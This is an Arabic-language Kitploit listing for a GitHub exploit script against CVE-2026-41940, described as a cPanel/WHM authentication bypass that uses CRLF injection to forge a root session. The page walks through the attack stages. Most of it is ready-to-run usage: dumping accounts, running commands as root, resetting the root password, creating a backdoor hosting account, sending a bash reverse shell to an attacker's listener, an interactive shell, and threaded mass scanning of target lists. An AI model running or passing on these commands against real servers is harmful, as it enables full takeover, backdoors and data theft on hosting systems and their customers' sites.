Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — تجاوز مصادقة cPanel/WHM (ثغرة يوم الصفر) | Kitploit
أدوات/GitHubGitHub/0xyur1/cve-2026-41940
المصادقة والترخيصماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHub0xyur1/cve-2026-41940

CVE-2026-41940

تجاوز مصادقة cPanel/WHM (ثغرة يوم الصفر)

102منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-41940: تجاوز المصادقة في cPanel/WHM (هدف واحد ومتعدد الأهداف)

إخلاء مسؤولية: يتم توفير هذا المستند والسكريبت المرتبط به (exploit.py) لأغراض تعليمية وبحوث أمنية واختبارات الاختراق المصرح بها فقط. لا تستخدم هذا البرنامج ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

نظرة عامة

exploit.py هو سكريبت يوضح ثغرة تجاوز المصادقة (CVE-2026-41940) في cPanel وWHM. تسمح الثغرة لمهاجم غير مصادق بحقن جلسة جذر (root session) في ذاكرة التخزين المؤقت للخدمة عبر خلل حقن CRLF، مما يمنح في النهاية وصولاً على مستوى الجذر إلى WHM دون الحاجة إلى بيانات اعتماد صالحة.

تحليل الثغرة وتدفق الاستغلال

يعمل الاستغلال عبر استغلال ثغرة حقن CRLF (إرجاع السطر وتغذية السطر) داخل آلية معالجة المصادقة الأساسية (Basic Authentication)، إلى جانب خلل في انتشار الجلسة. يقوم السكريبت بأتمتة الهجوم على أربع مراحل:

  1. صك الجلسة قبل المصادقة: الاتصال بنقاط نهاية تسجيل دخول عامة (مثل /login/ أو /cgi/login.cgi) للحصول على ملف تعريف ارتباط جلسة أساسي غير مصادق (whostmgrsession).
  2. حقن CRLF: إرسال ترويسة مصادقة أساسية مصممة خصيصًا تحتوي على حمولة مشفرة بـ Base64 تحقن حقول جلسة الجذر مباشرة في ذاكرة التخزين المؤقت للجلسات في cpsrvd. استجابة إعادة التوجيه من الخادم تسرّب رمز الأمان المُنشأ (cpsess).
  3. انتشار الجلسة: يتم إرسال ملف تعريف ارتباط الجلسة الخام إلى نقطة نهاية WHM مصادقة، مما يؤدي إلى تشغيل do_token_denied لنشر الجلسة المزورة في ذاكرة التخزين المؤقت للخدمة — مما يجعلها جلسة مصادقة صالحة.
  4. التحقق: الوصول إلى نقاط نهاية WHM API المقيدة (مثل /json-api/version) باستخدام الجلسة المزورة لتأكيد الوصول على مستوى الجذر.

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests
root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

الوسائط

اختيار الهدف

الوسيطالوصف
--target URLرابط WHM واحد (مثل https://target:2087)
--target-file FILEملف يحتوي على الأهداف (سطر واحد لكل ip:port) — يفعّل وضع الفحص تلقائيًا

خيارات الشبكة والأساسية

خيارات الاستغلال (بعد التجاوز)

خيارات الإخراج

الوسيطالوصف
--output FILEحفظ رمز الجلسة والتفاصيل في ملف JSON

أمثلة

root@kitploit:~
# تحقق مما إذا كان الهدف معرضًا للثغرة
python exploit.py --target https://target:2087 --check

# تفريغ معلومات الخادم (الإصدار، الحسابات، الصلاحيات)
python exploit.py --target https://target:2087 --dump

# توليد رابط تسجيل دخول جذر بنقرة واحدة (الصقه في المتصفح فورًا)
python exploit.py --target https://target:2087 --session

# تنفيذ أمر
python exploit.py --target https://target:2087 --exec "id"

# الدخول إلى قشرة WHM تفاعلية
python exploit.py --target https://target:2087 --shell

# تغيير كلمة مرور الجذر
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# استدعاء WHM API مباشرة
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# إنشاء حساب cPanel كباب خلفي
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# إرسال قشرة عكسية
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# تجاوز اسم المضيف (استخدمه عندما يفشل الاكتشاف التلقائي)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# فحص أهداف متعددة (وضع الفحص فقط)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# حفظ الجلسة في ملف
python exploit.py --target https://target:2087 --dump --output results.json

أوامر القشرة التفاعلية

عند استخدام --shell، تتوفر الأوامر التالية:


تذكير

طبّق أحدث تصحيحات الأمان الخاصة بـ cPanel/WHM فورًا.

تنزيل الأداة
الوسيطالوصف
--threads Nخيوط المعالجة المتزامنة لوضع الأهداف المتعددة (الافتراضي: 10)
--hostname HOSTتجاوز ترويسة Host — استخدمه عندما يفشل الاكتشاف التلقائي أو يعطي اسم مضيف خاطئ
--timeout Nمهلة زمنية لكل طلب بالثواني (الافتراضي: 15)
--retries Nعدد مرات إعادة المحاولة عند أخطاء الشبكة (الافتراضي: 3)
--cookie-name NAMEفرض اسم معين لملف تعريف ارتباط الجلسة (يُكتشف تلقائيًا إذا حُذف)
--no-verifyتخطي التحقق من المرحلة 4 والمتابعة على أي حال
الوسيطالوصف
--checkوضع الفحص فقط — تحقق من الثغرة دون استغلالها (يُضبط تلقائيًا مع --target-file)
--password PASSتغيير كلمة مرور الجذر إلى PASS
--api FUNCاستدعاء دالة محددة من WHM JSON-API
--api-params K=V,...معاملات مفصولة بفواصل لخيار --api
--exec CMDتنفيذ أمر نظام تشغيل عبر WHM scripts/run_script (بديل: rawexec)
--sessionتوليد رابط تسجيل دخول جذر بنقرة واحدة — افتحه فورًا، الرمز ينتهي بسرعة
--shellالدخول إلى قشرة WHM تفاعلية (هدف واحد فقط)
--dumpتفريغ معلومات الخادم: الإصدار، الحسابات، مناطق DNS، الصلاحيات
--add-user USER PASS DOMAINإنشاء حساب استضافة cPanel جديد
--revshell LHOST LPORTإرسال قشرة عكسية bash إلى المستمع الخاص بك
الأمرالوصف
api <function> [k=v ...]استدعاء دالة من WHM JSON-API (مثل api version)
exec <command>تشغيل أمر نظام تشغيل عبر WHM (مثل exec id)
passwd <newpass>تغيير كلمة مرور الجذر
dumpتفريغ معلومات الخادم
revshell <lhost> <lport>إرسال قشرة عكسية
add <user> <pass> <domain>إنشاء حساب cPanel
save <path>حفظ الجلسة الحالية في ملف
exit / quitالخروج من القشرة